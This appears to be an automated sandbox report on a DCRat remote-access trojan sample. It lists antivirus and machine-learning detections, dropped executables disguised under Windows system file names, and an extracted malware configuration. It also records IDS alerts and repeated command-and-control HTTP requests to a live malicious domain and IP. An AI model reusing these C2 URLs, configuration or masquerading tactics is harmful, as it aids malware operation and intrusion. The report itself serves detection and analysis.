Source: http://a1043195.xsph.ru/e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy	Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R	Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs	Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc	Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH	Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp	Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/	Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru	Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs	Avira: detection malicious, Label: VBS/Starter.VPVT
Source: C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs	Avira: detection malicious, Label: VBS/Runner.VPXJ
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Recovery\System.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984

Found malware configuration

Source: 00000000.00000002.2086148884.0000000012A2F000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"d\":\".\",\"1\":\"%\",\"I\":\"@\",\"U\":\" \",\"5\":\"(\",\"J\":\"*\",\"M\":\"&\",\"A\":\"-\",\"T\":\")\",\"C\":\",\",\"B\":\"_\",\"L\":\"^\",\"R\":\"~\",\"y\":\">\",\"i\":\"!\",\"0\":\"`\",\"V\":\"<\",\"G\":\"$\",\"E\":\"|\",\"9\":\"#\",\"3\":\";\"}", "PCRT": "{\"F\":\"&\",\"W\":\">\",\"X\":\"^\",\"2\":\"`\",\"0\":\",\",\"S\":\";\",\"u\":\"-\",\"G\":\"_\",\"J\":\"*\",\"C\":\"#\",\"Q\":\"@\",\"U\":\"<\",\"c\":\" \",\"b\":\"(\",\"d\":\"!\",\"z\":\"%\",\"T\":\"|\",\"V\":\")\",\"k\":\".\",\"R\":\"$\",\"a\":\"~\"}", "TAG": "", "MUTEX": "DCR_MUTEX-lWaBBBPi9nde67B22ADT", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": null, "AS": false, "ASO": false, "AD": false}

Multi AV Scanner detection for domain / URL

Source: a1043195.xsph.ru

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	ReversingLabs: Detection: 83%
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	ReversingLabs: Detection: 83%
Source: C:\Recovery\System.exe	ReversingLabs: Detection: 83%
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	ReversingLabs: Detection: 83%
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe	ReversingLabs: Detection: 83%

Multi AV Scanner detection for submitted file

Source: 4KjLUaW30K.exe	ReversingLabs: Detection: 83%
Source: 4KjLUaW30K.exe	Virustotal: Detection: 68%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Joe Sandbox ML: detected
Source: C:\Recovery\System.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 4KjLUaW30K.exe

Joe Sandbox ML: detected

Source: 4KjLUaW30K.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 4KjLUaW30K.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49732 -> 141.8.192.93:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49708 -> 141.8.192.93:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49759 -> 141.8.192.93:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49786 -> 141.8.192.93:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49836 -> 141.8.192.93:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49878 -> 141.8.192.93:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49897 -> 141.8.192.93:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49913 -> 141.8.192.93:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49955 -> 141.8.192.93:80

Source: Joe Sandbox View	IP Address: 141.8.192.93 141.8.192.93
Source: Joe Sandbox View	IP Address: 141.8.192.93 141.8.192.93

Source: Joe Sandbox View

ASN Name: SPRINTHOSTRU SPRINTHOSTRU

Source: global traffic	HTTP traffic detected: GET /e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ru

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ruConnection: Keep-Alive
